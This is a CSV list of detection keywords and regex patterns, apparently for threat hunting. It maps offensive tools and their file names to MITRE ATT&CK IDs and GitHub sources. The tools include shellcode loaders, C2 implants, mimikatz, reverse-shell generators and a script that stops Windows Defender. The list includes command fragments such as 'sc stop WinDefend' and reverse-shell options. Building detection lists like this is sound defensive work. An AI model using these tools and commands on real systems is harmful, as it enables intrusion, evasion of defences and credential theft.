"*shellcode-runner.py*",".{0,1000}shellcode\-runner\.py.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ShellcodeTemplate.x64.bin*",".{0,1000}ShellcodeTemplate\.x64\.bin.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*shellcodetester *",".{0,1000}shellcodetester\s.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","0","N/A","N/A","1","81","29","2023-11-01T23:29:28Z","2019-06-11T04:39:58Z" "*ShellCodeTester.csproj*",".{0,1000}ShellCodeTester\.csproj.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","81","29","2023-11-01T23:29:28Z","2019-06-11T04:39:58Z" "*shellcodetester.exe*",".{0,1000}shellcodetester\.exe.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","81","29","2023-11-01T23:29:28Z","2019-06-11T04:39:58Z" "*shellcodetester.git*",".{0,1000}shellcodetester\.git.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","81","29","2023-11-01T23:29:28Z","2019-06-11T04:39:58Z" "*shellcodetester.sh*",".{0,1000}shellcodetester\.sh.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","81","29","2023-11-01T23:29:28Z","2019-06-11T04:39:58Z" "*ShellCodeTester.sln*",".{0,1000}ShellCodeTester\.sln.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","81","29","2023-11-01T23:29:28Z","2019-06-11T04:39:58Z" "*shellerator --reverse-shell --lhost * --lport * --type *",".{0,1000}shellerator\s\-\-reverse\-shell\s\-\-lhost\s.{0,1000}\s\-\-lport\s.{0,1000}\s\-\-type\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ShellGen powershell.exe -ep bypass ",".{0,1000}ShellGen\spowershell\.exe\s\-ep\sbypass\s","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*ShellGhost.dll",".{0,1000}ShellGhost\.dll","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*ShellGhost.exe*",".{0,1000}ShellGhost\.exe.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*ShellGhost.sln*",".{0,1000}ShellGhost\.sln.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*ShellGhost.vcxproj*",".{0,1000}ShellGhost\.vcxproj.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*ShellGhost_mapping.py*",".{0,1000}ShellGhost_mapping\.py.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*ShellGhost-master.zip*",".{0,1000}ShellGhost\-master\.zip.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*ShellProfilePersistence.json*",".{0,1000}ShellProfilePersistence\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*shellster/LDAPPER*",".{0,1000}shellster\/LDAPPER.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","1","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" "*shellter.exe*",".{0,1000}shellter\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*shepardsbind_recv.py*",".{0,1000}shepardsbind_recv\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*shepbind_serv.exe*",".{0,1000}shepbind_serv\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Sherlock.ps1*",".{0,1000}Sherlock\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*sherlock.ps1*",".{0,1000}sherlock\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Sherlock_Vulns.txt*",".{0,1000}Sherlock_Vulns\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Shhhavoc.py *",".{0,1000}Shhhavoc\.py\s.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*Shhhloader.py*",".{0,1000}Shhhloader\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*Shhhloader-main\*",".{0,1000}Shhhloader\-main\\.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*Shhmon.csproj*",".{0,1000}Shhmon\.csproj.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*Shhmon.exe*",".{0,1000}Shhmon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Shhmon.exe*",".{0,1000}Shhmon\.exe.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*Shhmon.git*",".{0,1000}Shhmon\.git.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*shinject *",".{0,1000}shinject\s.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*shinject.nim*",".{0,1000}shinject\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*shinject_ex *",".{0,1000}shinject_ex\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shit.fuck.org*",".{0,1000}shit\.fuck\.org.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*shmilylty/cheetah*",".{0,1000}shmilylty\/cheetah.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*shocknawe.py*",".{0,1000}shocknawe\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*Shodan.io*",".{0,1000}Shodan\.io.{0,1000}","offensive_tool_keyword","shodan.io","Shodan is the worlds first search engine for Internet-connected devices.","T1016 - T1597 - T1526 - T1046 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://www.shodan.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shodanp.py*",".{0,1000}shodanp\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*Shoggoth doesn't support x86 PE yet*",".{0,1000}Shoggoth\sdoesn\'t\ssupport\sx86\sPE\syet.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*ShoggothPolyEngine(*",".{0,1000}ShoggothPolyEngine\(.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*ShorSec/DavRelayUp*",".{0,1000}ShorSec\/DavRelayUp.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*ShorSec/DllNotificationInjection*",".{0,1000}ShorSec\/DllNotificationInjection.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*ShorSec/ShadowSpray*",".{0,1000}ShorSec\/ShadowSpray.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*Show-BallonTip.ps1*",".{0,1000}Show\-BallonTip\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Show-BalloonTip.ps1*",".{0,1000}Show\-BalloonTip\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Show-TargetScreen.ps1*",".{0,1000}Show\-TargetScreen\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Show-TargetScreen.ps1*",".{0,1000}Show\-TargetScreen\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*-ShowWindowMode:Hide sc stop WinDefend*",".{0,1000}\-ShowWindowMode\:Hide\ssc\sstop\sWinDefend.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*Show-WMImplantMainMenu*",".{0,1000}Show\-WMImplantMainMenu.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*shspawn x64 *",".{0,1000}shspawn\sx64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shspawn x86 *",".{0,1000}shspawn\sx86\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shucknt.php*",".{0,1000}shucknt\.php.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*ShuckNT-main*",".{0,1000}ShuckNT\-main.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*ShutdownRepo/pywhisker*",".{0,1000}ShutdownRepo\/pywhisker.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*ShutdownRepo/smartbrute*",".{0,1000}ShutdownRepo\/smartbrute.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ShutdownRepo/smartbrute*",".{0,1000}ShutdownRepo\/smartbrute.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*sid::add*",".{0,1000}sid\:\:add.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sid::clear*",".{0,1000}sid\:\:clear.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sid::lookup*",".{0,1000}sid\:\:lookup.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" 